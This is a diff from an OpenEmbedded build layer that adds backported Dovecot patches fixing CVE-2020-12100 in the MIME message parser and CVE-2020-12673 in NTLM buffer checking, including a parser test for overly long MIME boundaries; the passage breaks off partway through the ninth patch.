-662,7 +659,7 @@ AC_CACHE_CHECK([whether posix_fallocate() works],i_cv_posix_fallocate_works,[ +@@ -605,7 +602,7 @@ AC_CACHE_CHECK([whether posix_fallocate( #if defined(__GLIBC__) && (__GLIBC__ < 2 || __GLIBC_MINOR__ < 7) possibly broken posix_fallocate #endif @@ -52,7 +52,7 @@ index 3b32614..94ec002 100644 int fd = creat("conftest.temp", 0600); int ret; if (fd == -1) { -@@ -671,8 +668,6 @@ AC_CACHE_CHECK([whether posix_fallocate() works],i_cv_posix_fallocate_works,[ +@@ -614,8 +611,6 @@ AC_CACHE_CHECK([whether posix_fallocate( } ret = posix_fallocate(fd, 1024, 1024) < 0 ? 1 : 0; unlink("conftest.temp"); @@ -61,6 +61,3 @@ index 3b32614..94ec002 100644 ], [ i_cv_posix_fallocate_works=yes ], [ --- -1.8.4.2 - diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0001-doveadm-Fix-parallel-build.patch b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0001-doveadm-Fix-parallel-build.patch index 65ae9bf910..3170ae8658 100644 --- a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0001-doveadm-Fix-parallel-build.patch +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0001-doveadm-Fix-parallel-build.patch @@ -18,11 +18,11 @@ Signed-off-by: Khem Raj src/doveadm/Makefile.am | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) -diff --git a/src/doveadm/Makefile.am b/src/doveadm/Makefile.am -index c644646..6ae9144 100644 ---- a/src/doveadm/Makefile.am -+++ b/src/doveadm/Makefile.am -@@ -180,8 +180,8 @@ test_libs = \ +Index: dovecot-2.2.36.4/src/doveadm/Makefile.am +=================================================================== +--- dovecot-2.2.36.4.orig/src/doveadm/Makefile.am ++++ dovecot-2.2.36.4/src/doveadm/Makefile.am +@@ -182,8 +182,8 @@ test_libs = \ ../lib/liblib.la test_deps = $(noinst_LTLIBRARIES) $(test_libs) @@ -33,6 +33,3 @@ index c644646..6ae9144 100644 test_doveadm_util_DEPENDENCIES = $(test_deps) check: check-am check-test --- -2.14.2 - diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0001-lib-mail-message-parser-Add-a-message_part_finish-he.patch b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0001-lib-mail-message-parser-Add-a-message_part_finish-he.patch new file mode 100644 index 0000000000..583f71ca58 --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0001-lib-mail-message-parser-Add-a-message_part_finish-he.patch @@ -0,0 +1,76 @@ +From 667d353b0f217372e8cc43ea4fe13466689c7ed0 Mon Sep 17 00:00:00 2001 +From: Timo Sirainen +Date: Thu, 23 Apr 2020 11:33:31 +0300 +Subject: [PATCH 01/13] lib-mail: message-parser - Add a message_part_finish() + helper function + +--- + src/lib-mail/message-parser.c | 25 ++++++++++++------------- + 1 file changed, 12 insertions(+), 13 deletions(-) + +Signed-off-by: Sana Kazi + +CVE: CVE-2020-12100 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_2.2.33.2-1ubuntu4.7.debian.tar.xz] +Comment: No change in any hunk + +diff --git a/src/lib-mail/message-parser.c b/src/lib-mail/message-parser.c +index b1de1950a..aaa8dd8b7 100644 +--- a/src/lib-mail/message-parser.c ++++ b/src/lib-mail/message-parser.c +@@ -195,6 +195,13 @@ message_part_append(pool_t pool, struct message_part *parent) + return part; + } + ++static void message_part_finish(struct message_parser_ctx *ctx) ++{ ++ message_size_add(&ctx->part->parent->body_size, &ctx->part->body_size); ++ message_size_add(&ctx->part->parent->body_size, &ctx->part->header_size); ++ ctx->part = ctx->part->parent; ++} ++ + static void parse_next_body_multipart_init(struct message_parser_ctx *ctx) + { + struct message_boundary *b; +@@ -312,19 +319,16 @@ static int parse_part_finish(struct message_parser_ctx *ctx, + struct message_boundary *boundary, + struct message_block *block_r, bool first_line) + { +- struct message_part *part; + size_t line_size; + + i_assert(ctx->last_boundary == NULL); + + /* get back to parent MIME part, summing the child MIME part sizes + into parent's body sizes */ +- for (part = ctx->part; part != boundary->part; part = part->parent) { +- message_size_add(&part->parent->body_size, &part->body_size); +- message_size_add(&part->parent->body_size, &part->header_size); ++ while (ctx->part != boundary->part) { ++ message_part_finish(ctx); ++ i_assert(ctx->part != NULL); + } +- i_assert(part != NULL); +- ctx->part = part; + + if (boundary->epilogue_found) { + /* this boundary isn't needed anymore */ +@@ -1132,13 +1136,8 @@ int message_parser_parse_next_block(struct message_parser_ctx *ctx, + i_assert(ctx->input->eof || ctx->input->closed || + ctx->input->stream_errno != 0 || + ctx->broken_reason != NULL); +- while (ctx->part->parent != NULL) { +- message_size_add(&ctx->part->parent->body_size, +- &ctx->part->body_size); +- message_size_add(&ctx->part->parent->body_size, +- &ctx->part->header_size); +- ctx->part = ctx->part->parent; +- } ++ while (ctx->part->parent != NULL) ++ message_part_finish(ctx); + } + + if (block_r->size == 0) { +-- +2.11.0 + diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0002-lib-mail-message-parser-Change-message_part_append-t.patch b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0002-lib-mail-message-parser-Change-message_part_append-t.patch new file mode 100644 index 0000000000..9f24320ebf --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0002-lib-mail-message-parser-Change-message_part_append-t.patch @@ -0,0 +1,71 @@ +From de0da7bc8df55521db8fa787f88e293618c96386 Mon Sep 17 00:00:00 2001 +From: Timo Sirainen +Date: Thu, 23 Apr 2020 11:34:22 +0300 +Subject: [PATCH 02/13] lib-mail: message-parser - Change message_part_append() + to do all work internally + +--- + src/lib-mail/message-parser.c | 13 +++++++------ + 1 file changed, 7 insertions(+), 6 deletions(-) + +Signed-off-by: Sana Kazi + +CVE: CVE-2020-12100 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_2.2.33.2-1ubuntu4.7.debian.tar.xz] +Comment: No change in any hunk + +diff --git a/src/lib-mail/message-parser.c b/src/lib-mail/message-parser.c +index aaa8dd8b7..2edf3e7a6 100644 +--- a/src/lib-mail/message-parser.c ++++ b/src/lib-mail/message-parser.c +@@ -167,16 +167,17 @@ static int message_parser_read_more(struct message_parser_ctx *ctx, + return 1; + } + +-static struct message_part * +-message_part_append(pool_t pool, struct message_part *parent) ++static void ++message_part_append(struct message_parser_ctx *ctx) + { ++ struct message_part *parent = ctx->part; + struct message_part *p, *part, **list; + + i_assert(parent != NULL); + i_assert((parent->flags & (MESSAGE_PART_FLAG_MULTIPART | + MESSAGE_PART_FLAG_MESSAGE_RFC822)) != 0); + +- part = p_new(pool, struct message_part, 1); ++ part = p_new(ctx->part_pool, struct message_part, 1); + part->parent = parent; + for (p = parent; p != NULL; p = p->parent) + p->children_count++; +@@ -192,7 +193,7 @@ message_part_append(pool_t pool, struct message_part *parent) + list = &(*list)->next; + + *list = part; +- return part; ++ ctx->part = part; + } + + static void message_part_finish(struct message_parser_ctx *ctx) +@@ -220,7 +221,7 @@ static void parse_next_body_multipart_init(struct message_parser_ctx *ctx) + static int parse_next_body_message_rfc822_init(struct message_parser_ctx *ctx, + struct message_block *block_r) + { +- ctx->part = message_part_append(ctx->part_pool, ctx->part); ++ message_part_append(ctx); + return parse_next_header_init(ctx, block_r); + } + +@@ -270,7 +271,7 @@ boundary_line_find(struct message_parser_ctx *ctx, + static int parse_next_mime_header_init(struct message_parser_ctx *ctx, + struct message_block *block_r) + { +- ctx->part = message_part_append(ctx->part_pool, ctx->part); ++ message_part_append(ctx); + ctx->part->flags |= MESSAGE_PART_FLAG_IS_MIME; + + return parse_next_header_init(ctx, block_r); +-- +2.11.0 + diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0002-lib-ntlm-Check-buffer-length-on-responses.patch b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0002-lib-ntlm-Check-buffer-length-on-responses.patch new file mode 100644 index 0000000000..81aead8aad --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0002-lib-ntlm-Check-buffer-length-on-responses.patch @@ -0,0 +1,37 @@ +Backport of: + +From 1c6405d3026e5ceae3d214d63945bba85251af4c Mon Sep 17 00:00:00 2001 +From: Aki Tuomi +Date: Mon, 18 May 2020 12:33:39 +0300 +Subject: [PATCH 2/3] lib-ntlm: Check buffer length on responses + +Add missing check for buffer length. + +If this is not checked, it is possible to send message which +causes read past buffer bug. + +Broken in c7480644202e5451fbed448508ea29a25cffc99c +--- + src/lib-ntlm/ntlm-message.c | 5 +++++ + 1 file changed, 5 insertions(+) + +Signed-off-by: Sana Kazi + +CVE: CVE-2020-12673 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_2.2.33.2-1ubuntu4.7.debian.tar.xz] +Comment: No change in any hunk + +--- a/src/lib-ntlm/ntlm-message.c ++++ b/src/lib-ntlm/ntlm-message.c +@@ -184,6 +184,11 @@ static int ntlmssp_check_buffer(const st + if (length == 0 && space == 0) + return 1; + ++ if (length > data_size) { ++ *error = "buffer length out of bounds"; ++ return 0; ++ } ++ + if (offset >= data_size) { + *error = "buffer offset out of bounds"; + return 0; diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0003-lib-mail-message-parser-Optimize-updating-children_c.patch b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0003-lib-mail-message-parser-Optimize-updating-children_c.patch new file mode 100644 index 0000000000..e530902350 --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0003-lib-mail-message-parser-Optimize-updating-children_c.patch @@ -0,0 +1,49 @@ +From a9800b436fcf1f9633c2b136a9c5cb7a486a8a52 Mon Sep 17 00:00:00 2001 +From: Timo Sirainen +Date: Thu, 23 Apr 2020 11:36:48 +0300 +Subject: [PATCH 03/13] lib-mail: message-parser - Optimize updating + children_count + +--- + src/lib-mail/message-parser.c | 5 ++--- + 1 file changed, 2 insertions(+), 3 deletions(-) + +Signed-off-by: Sana Kazi + +CVE: CVE-2020-12100 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_2.2.33.2-1ubuntu4.7.debian.tar.xz] +Comment: No change in any hunk + +diff --git a/src/lib-mail/message-parser.c b/src/lib-mail/message-parser.c +index 2edf3e7a6..05768a058 100644 +--- a/src/lib-mail/message-parser.c ++++ b/src/lib-mail/message-parser.c +@@ -171,7 +171,7 @@ static void + message_part_append(struct message_parser_ctx *ctx) + { + struct message_part *parent = ctx->part; +- struct message_part *p, *part, **list; ++ struct message_part *part, **list; + + i_assert(parent != NULL); + i_assert((parent->flags & (MESSAGE_PART_FLAG_MULTIPART | +@@ -179,8 +179,6 @@ message_part_append(struct message_parser_ctx *ctx) + + part = p_new(ctx->part_pool, struct message_part, 1); + part->parent = parent; +- for (p = parent; p != NULL; p = p->parent) +- p->children_count++; + + /* set child position */ + part->physical_pos = +@@ -200,6 +198,7 @@ static void message_part_finish(struct message_parser_ctx *ctx) + { + message_size_add(&ctx->part->parent->body_size, &ctx->part->body_size); + message_size_add(&ctx->part->parent->body_size, &ctx->part->header_size); ++ ctx->part->parent->children_count += 1 + ctx->part->children_count; + ctx->part = ctx->part->parent; + } + +-- +2.11.0 + diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0004-lib-mail-message-parser-Optimize-appending-new-part-.patch b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0004-lib-mail-message-parser-Optimize-appending-new-part-.patch new file mode 100644 index 0000000000..ba6667fa99 --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0004-lib-mail-message-parser-Optimize-appending-new-part-.patch @@ -0,0 +1,90 @@ +From 99ee7596712cf0ea0a288b712bc898ecb2b35f9b Mon Sep 17 00:00:00 2001 +From: Timo Sirainen +Date: Thu, 23 Apr 2020 12:00:38 +0300 +Subject: [PATCH 04/13] lib-mail: message-parser - Optimize appending new part + to linked list + +--- + src/lib-mail/message-parser.c | 28 ++++++++++++++++++++++------ + 1 file changed, 22 insertions(+), 6 deletions(-) + +Signed-off-by: Sana Kazi + +CVE: CVE-2020-12100 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_2.2.33.2-1ubuntu4.7.debian.tar.xz] +Comment: No change in any hunk + +Index: dovecot-2.2.36.4/src/lib-mail/message-parser.c +=================================================================== +--- dovecot-2.2.36.4.orig/src/lib-mail/message-parser.c ++++ dovecot-2.2.36.4/src/lib-mail/message-parser.c +@@ -1,7 +1,7 @@ + /* Copyright (c) 2002-2018 Dovecot authors, see the included COPYING file */ + + #include "lib.h" +-#include "buffer.h" ++#include "array.h" + #include "str.h" + #include "istream.h" + #include "rfc822-parser.h" +@@ -34,6 +34,9 @@ struct message_parser_ctx { + const char *last_boundary; + struct message_boundary *boundaries; + ++ struct message_part **next_part; ++ ARRAY(struct message_part **) next_part_stack; ++ + size_t skip; + char last_chr; + unsigned int want_count; +@@ -171,7 +174,7 @@ static void + message_part_append(struct message_parser_ctx *ctx) + { + struct message_part *parent = ctx->part; +- struct message_part *part, **list; ++ struct message_part *part; + + i_assert(parent != NULL); + i_assert((parent->flags & (MESSAGE_PART_FLAG_MULTIPART | +@@ -186,16 +189,27 @@ message_part_append(struct message_parse + parent->body_size.physical_size + + parent->header_size.physical_size; + +- list = &part->parent->children; +- while (*list != NULL) +- list = &(*list)->next; ++ /* add to parent's linked list */ ++ *ctx->next_part = part; ++ /* update the parent's end-of-linked-list pointer */ ++ struct message_part **next_part = &part->next; ++ array_append(&ctx->next_part_stack, &next_part, 1); ++ /* This part is now the new parent for the next message_part_append() ++ call. Its linked list begins with the children pointer. */ ++ ctx->next_part = &part->children; + +- *list = part; + ctx->part = part; + } + + static void message_part_finish(struct message_parser_ctx *ctx) + { ++ struct message_part **const *parent_next_partp; ++ unsigned int count = array_count(&ctx->next_part_stack); ++ ++ parent_next_partp = array_idx(&ctx->next_part_stack, count-1); ++ array_delete(&ctx->next_part_stack, count-1, 1); ++ ctx->next_part = *parent_next_partp; ++ + message_size_add(&ctx->part->parent->body_size, &ctx->part->body_size); + message_size_add(&ctx->part->parent->body_size, &ctx->part->header_size); + ctx->part->parent->children_count += 1 + ctx->part->children_count; +@@ -1062,7 +1076,9 @@ message_parser_init(pool_t part_pool, st + ctx = message_parser_init_int(input, hdr_flags, flags); + ctx->part_pool = part_pool; + ctx->parts = ctx->part = p_new(part_pool, struct message_part, 1); ++ ctx->next_part = &ctx->part->children; + ctx->parse_next_block = parse_next_header_init; ++ p_array_init(&ctx->next_part_stack, ctx->parser_pool, 4); + return ctx; + } + diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0005-lib-mail-message-parser-Minor-code-cleanup-to-findin.patch b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0005-lib-mail-message-parser-Minor-code-cleanup-to-findin.patch new file mode 100644 index 0000000000..4e63509b45 --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0005-lib-mail-message-parser-Minor-code-cleanup-to-findin.patch @@ -0,0 +1,45 @@ +From e39c95b248917eb2b596ca55a957f3cbc7fd406f Mon Sep 17 00:00:00 2001 +From: Timo Sirainen +Date: Thu, 23 Apr 2020 12:10:07 +0300 +Subject: [PATCH 05/13] lib-mail: message-parser - Minor code cleanup to + finding the end of boundary line + +--- + src/lib-mail/message-parser.c | 9 ++++----- + 1 file changed, 4 insertions(+), 5 deletions(-) + +Signed-off-by: Sana Kazi + +CVE: CVE-2020-12100 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_2.2.33.2-1ubuntu4.7.debian.tar.xz] +Comment: No change in any hunk + +diff --git a/src/lib-mail/message-parser.c b/src/lib-mail/message-parser.c +index ff4e09e5a..6c6a680b5 100644 +--- a/src/lib-mail/message-parser.c ++++ b/src/lib-mail/message-parser.c +@@ -260,17 +260,16 @@ boundary_line_find(struct message_parser_ctx *ctx, + } + + /* need to find the end of line */ +- if (memchr(data + 2, '\n', size - 2) == NULL && +- size < BOUNDARY_END_MAX_LEN && ++ data += 2; ++ size -= 2; ++ if (memchr(data, '\n', size) == NULL && ++ size+2 < BOUNDARY_END_MAX_LEN && + !ctx->input->eof && !full) { + /* no LF found */ + ctx->want_count = BOUNDARY_END_MAX_LEN; + return 0; + } + +- data += 2; +- size -= 2; +- + *boundary_r = boundary_find(ctx->boundaries, data, size); + if (*boundary_r == NULL) + return -1; +-- +2.11.0 + diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0006-lib-mail-message-parser-Truncate-excessively-long-MI.patch b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0006-lib-mail-message-parser-Truncate-excessively-long-MI.patch new file mode 100644 index 0000000000..1012d7983e --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0006-lib-mail-message-parser-Truncate-excessively-long-MI.patch @@ -0,0 +1,163 @@ +From aed125484a346b4893c1a169088c39fe7ced01f3 Mon Sep 17 00:00:00 2001 +From: Timo Sirainen +Date: Thu, 23 Apr 2020 12:53:12 +0300 +Subject: [PATCH 06/13] lib-mail: message-parser - Truncate excessively long + MIME boundaries + +RFC 2046 requires that the boundaries are a maximum of 70 characters +(excluding the "--" prefix and suffix). We allow 80 characters for a bit of +extra safety. Anything longer than that is truncated and treated the same +as if it was just 80 characters. +--- + src/lib-mail/message-parser.c | 7 ++- + src/lib-mail/test-message-parser.c | 95 ++++++++++++++++++++++++++++++++++++++ + 2 files changed, 100 insertions(+), 2 deletions(-) + +Signed-off-by: Sana Kazi + +CVE: CVE-2020-12100 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_2.2.33.2-1ubuntu4.7.debian.tar.xz] +Comment: No change in any hunk + +diff --git a/src/lib-mail/message-parser.c b/src/lib-mail/message-parser.c +index 6c6a680b5..92f541b02 100644 +--- a/src/lib-mail/message-parser.c ++++ b/src/lib-mail/message-parser.c +@@ -10,7 +10,8 @@ + + /* RFC-2046 requires boundaries are max. 70 chars + "--" prefix + "--" suffix. + We'll add a bit more just in case. */ +-#define BOUNDARY_END_MAX_LEN (70 + 2 + 2 + 10) ++#define BOUNDARY_STRING_MAX_LEN (70 + 10) ++#define BOUNDARY_END_MAX_LEN (BOUNDARY_STRING_MAX_LEN + 2 + 2) + + struct message_boundary { + struct message_boundary *next; +@@ -526,8 +527,10 @@ static void parse_content_type(struct message_parser_ctx *ctx, + rfc2231_parse(&parser, &results); + for (; *results != NULL; results += 2) { + if (strcasecmp(results[0], "boundary") == 0) { ++ /* truncate excessively long boundaries */ + ctx->last_boundary = +- p_strdup(ctx->parser_pool, results[1]); ++ p_strndup(ctx->parser_pool, results[1], ++ BOUNDARY_STRING_MAX_LEN); + break; + } + } +diff --git a/src/lib-mail/test-message-parser.c b/src/lib-mail/test-message-parser.c +index 1f1aa1437..94aa3eb7c 100644 +--- a/src/lib-mail/test-message-parser.c ++++ b/src/lib-mail/test-message-parser.c +@@ -642,6 +642,100 @@ static void test_message_parser_no_eoh(void) + test_end(); + } + ++static void test_message_parser_long_mime_boundary(void) ++{ ++ /* Close the boundaries in wrong reverse order. But because all ++ boundaries are actually truncated to the same size (..890) it ++ works the same as if all of them were duplicate boundaries. */ ++static const char input_msg[] = ++"Content-Type: multipart/mixed; boundary=\"1234567890123456789012345678901234567890123456789012345678901234567890123456789012\"\n" ++"\n" ++"--1234567890123456789012345678901234567890123456789012345678901234567890123456789012\n" ++"Content-Type: multipart/mixed; boundary=\"123456789012345678901234567890123456789012345678901234567890123456789012345678901\"\n" ++"\n" ++"--123456789012345678901234567890123456789012345678901234567890123456789012345678901\n" ++"Content-Type: multipart/mixed; boundary=\"12345678901234567890123456789012345678901234567890123456789012345678901234567890\"\n" ++"\n" ++"--12345678901234567890123456789012345678901234567890123456789012345678901234567890\n" ++"Content-Type: text/plain\n" ++"\n" ++"1\n" ++"--1234567890123456789012345678901234567890123456789012345678901234567890123456789012\n" ++"Content-Type: text/plain\n" ++"\n" ++"22\n" ++"--123456789012345678901234567890123456789012345678901234567890123456789012345678901\n" ++"Content-Type: text/plain\n" ++"\n" ++"333\n" ++"--12345678901234567890123456789012345678901234567890123456789012345678901234567890\n" ++"Content-Type: text/plain\n" ++"\n" ++"4444\n"; ++ struct message_parser_ctx *parser; ++ struct istream *input; ++ struct message_part *parts, *part; ++ struct message_block block; ++ pool_t pool; ++ int ret; ++ ++ test_begin("message parser long mime boundary"); ++ pool = pool_alloconly_create("message parser", 10240); ++ input = test_istream_create(input_msg); ++ ++ parser = message_parser_init(pool, input, 0, 0); ++ while ((ret = message_parser_parse_next_block(parser, &block)) > 0) ; ++ test_assert(ret < 0); ++ message_parser_deinit(&parser, &parts); ++ ++ part = parts; ++ test_assert(part->children_count == 6); ++ test_assert(part->flags == (MESSAGE_PART_FLAG_MULTIPART | MESSAGE_PART_FLAG_IS_MIME)); ++ test_assert(part->header_size.lines == 2); ++ test_assert(part->header_size.physical_size == 126); ++ test_assert(part->header_size.virtual_size == 126+2); ++ test_assert(part->body_size.lines == 22); ++ test_assert(part->body_size.physical_size == 871); ++ test_assert(part->body_size.virtual_size == 871+22); ++ ++ part = parts->children; ++ test_assert(part->children_count == 5); ++ test_assert(part->flags == (MESSAGE_PART_FLAG_MULTIPART | MESSAGE_PART_FLAG_IS_MIME)); ++ test_assert(part->header_size.lines == 2); ++ test_assert(part->header_size.physical_size == 125); ++ test_assert(part->header_size.virtual_size == 125+2); ++ test_assert(part->body_size.lines == 19); ++ test_assert(part->body_size.physical_size == 661); ++ test_assert(part->body_size.virtual_size == 661+19); ++ ++ part = parts->children->children; ++ test_assert(part->children_count == 4); ++ test_assert(part->flags == (MESSAGE_PART_FLAG_MULTIPART | MESSAGE_PART_FLAG_IS_MIME)); ++ test_assert(part->header_size.lines == 2); ++ test_assert(part->header_size.physical_size == 124); ++ test_assert(part->header_size.virtual_size == 124+2); ++ test_assert(part->body_size.lines == 16); ++ test_assert(part->body_size.physical_size == 453); ++ test_assert(part->body_size.virtual_size == 453+16); ++ ++ part = parts->children->children->children; ++ for (unsigned int i = 1; i <= 3; i++, part = part->next) { ++ test_assert(part->children_count == 0); ++ test_assert(part->flags == (MESSAGE_PART_FLAG_TEXT | MESSAGE_PART_FLAG_IS_MIME)); ++ test_assert(part->header_size.lines == 2); ++ test_assert(part->header_size.physical_size == 26); ++ test_assert(part->header_size.virtual_size == 26+2); ++ test_assert(part->body_size.lines == 0); ++ test_assert(part->body_size.physical_size == i); ++ test_assert(part->body_size.virtual_size == i); ++ } ++ ++ test_parsed_parts(input, parts); ++ i_stream_unref(&input); ++ pool_unref(&pool); ++ test_end(); ++} ++ + int main(void) + { + static void (*test_functions[])(void) = { +@@ -654,6 +748,7 @@ int main(void) + test_message_parser_garbage_suffix_mime_boundary, + test_message_parser_continuing_mime_boundary, + test_message_parser_continuing_truncated_mime_boundary, ++ test_message_parser_long_mime_boundary, + test_message_parser_no_eoh, + NULL + }; +-- +2.11.0 + diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0007-lib-mail-message-parser-Optimize-boundary-lookups-wh.patch b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0007-lib-mail-message-parser-Optimize-boundary-lookups-wh.patch new file mode 100644 index 0000000000..eeb6c96f1a --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0007-lib-mail-message-parser-Optimize-boundary-lookups-wh.patch @@ -0,0 +1,72 @@ +From 5f8de52fec3191a1aa68a399ee2068485737dc4f Mon Sep 17 00:00:00 2001 +From: Timo Sirainen +Date: Thu, 23 Apr 2020 13:06:02 +0300 +Subject: [PATCH 07/13] lib-mail: message-parser - Optimize boundary lookups + when exact boundary is found + +When an exact boundary is found, there's no need to continue looking for +more boundaries. +--- + src/lib-mail/message-parser.c | 26 ++++++++++++++++++++++---- + 1 file changed, 22 insertions(+), 4 deletions(-) + +Signed-off-by: Sana Kazi + +CVE: CVE-2020-12100 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_2.2.33.2-1ubuntu4.7.debian.tar.xz] +Comment: No change in any hunk + +diff --git a/src/lib-mail/message-parser.c b/src/lib-mail/message-parser.c +index 92f541b02..c2934c761 100644 +--- a/src/lib-mail/message-parser.c ++++ b/src/lib-mail/message-parser.c +@@ -80,8 +80,14 @@ boundary_find(struct message_boundary *boundaries, + while (boundaries != NULL) { + if (boundaries->len <= len && + memcmp(boundaries->boundary, data, boundaries->len) == 0 && +- (best == NULL || best->len < boundaries->len)) ++ (best == NULL || best->len < boundaries->len)) { + best = boundaries; ++ if (best->len == len) { ++ /* This is exactly the wanted boundary. There ++ can't be a better one. */ ++ break; ++ } ++ } + + boundaries = boundaries->next; + } +@@ -263,15 +269,27 @@ boundary_line_find(struct message_parser_ctx *ctx, + /* need to find the end of line */ + data += 2; + size -= 2; +- if (memchr(data, '\n', size) == NULL && ++ const unsigned char *lf_pos = memchr(data, '\n', size); ++ if (lf_pos == NULL && + size+2 < BOUNDARY_END_MAX_LEN && + !ctx->input->eof && !full) { + /* no LF found */ + ctx->want_count = BOUNDARY_END_MAX_LEN; + return 0; + } +- +- *boundary_r = boundary_find(ctx->boundaries, data, size); ++ size_t find_size = size; ++ ++ if (lf_pos != NULL) { ++ find_size = lf_pos - data; ++ if (find_size > 0 && data[find_size-1] == '\r') ++ find_size--; ++ if (find_size > 2 && data[find_size-1] == '-' && ++ data[find_size-2] == '-') ++ find_size -= 2; ++ } else if (find_size > BOUNDARY_END_MAX_LEN) ++ find_size = BOUNDARY_END_MAX_LEN; ++ ++ *boundary_r = boundary_find(ctx->boundaries, data, find_size); + if (*boundary_r == NULL) + return -1; + +-- +2.11.0 + diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0008-lib-mail-message-parser-Add-boundary_remove_until-he.patch b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0008-lib-mail-message-parser-Add-boundary_remove_until-he.patch new file mode 100644 index 0000000000..4af070a879 --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0008-lib-mail-message-parser-Add-boundary_remove_until-he.patch @@ -0,0 +1,50 @@ +From 929396767d831bedbdec6392aaa835b045332fd3 Mon Sep 17 00:00:00 2001 +From: Timo Sirainen +Date: Thu, 23 Apr 2020 14:53:27 +0300 +Subject: [PATCH 08/13] lib-mail: message-parser - Add boundary_remove_until() + helper function + +--- + src/lib-mail/message-parser.c | 11 +++++++++-- + 1 file changed, 9 insertions(+), 2 deletions(-) + +Signed-off-by: Sana Kazi + +CVE: CVE-2020-12100 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_2.2.33.2-1ubuntu4.7.debian.tar.xz] +Comment: No change in any hunk + +diff --git a/src/lib-mail/message-parser.c b/src/lib-mail/message-parser.c +index c2934c761..028f74159 100644 +--- a/src/lib-mail/message-parser.c ++++ b/src/lib-mail/message-parser.c +@@ -223,6 +223,13 @@ static void message_part_finish(struct message_parser_ctx *ctx) + ctx->part = ctx->part->parent; + } + ++static void ++boundary_remove_until(struct message_parser_ctx *ctx, ++ struct message_boundary *boundary) ++{ ++ ctx->boundaries = boundary; ++} ++ + static void parse_next_body_multipart_init(struct message_parser_ctx *ctx) + { + struct message_boundary *b; +@@ -364,10 +371,10 @@ static int parse_part_finish(struct message_parser_ctx *ctx, + + if (boundary->epilogue_found) { + /* this boundary isn't needed anymore */ +- ctx->boundaries = boundary->next; ++ boundary_remove_until(ctx, boundary->next); + } else { + /* forget about the boundaries we possibly skipped */ +- ctx->boundaries = boundary; ++ boundary_remove_until(ctx, boundary); + } + + /* the boundary itself should already be in buffer. add that. */ +-- +2.11.0 + diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0009-lib-mail-message-parser-Don-t-use-memory-pool-for-pa.patch b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0009-lib-mail-message-parser-Don-t-use-memory-pool-for-pa.patch new file mode 100644 index 0000000000..aade7dc2b3 --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0009-lib-mail-message-parser-Don-t-use-memory-pool-for-pa.patch @@ -0,0 +1,169 @@ +From d53d83214b1d635446a8cf8ff9438cc530133d62 Mon Sep 17 00:00:00 2001 +From: Timo Sirainen +Date: Thu, 23 Apr 2020 15:00:57 +0300 +Subject: [PATCH 09/13] lib-mail: message-parser - Don't use memory pool for + parser + +This reduces memory usage when parsing many MIME parts where boundaries are +being added and removed constantly. +--- + src/lib-mail/message-parser.c | 48 ++++++++++++++++++++++++++++--------------- + 1 file changed, 32 insertions(+), 16 deletions(-) + +Signed-off-by: Sana Kazi + +CVE: CVE-2020-12100 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_2.2.33.2-1ubuntu4.7.debian.tar.xz] +Comment: No change in any hunk + +diff --git a/src/lib-mail/message-parser.c b/src/lib-mail/message-parser.c +index 028f74159..8970d8e0e 100644 +--- a/src/lib-mail/message-parser.c ++++ b/src/lib-mail/message-parser.c +@@ -17,14 +17,14 @@ struct message_boundary { + struct message_boundary *next; + + struct message_part *part; +- const char *boundary; ++ char *boundary; + size_t len; + + unsigned int epilogue_found:1; + }; + + struct message_parser_ctx { +- pool_t parser_pool, part_pool; ++ pool_t part_pool; + struct istream *input; + struct 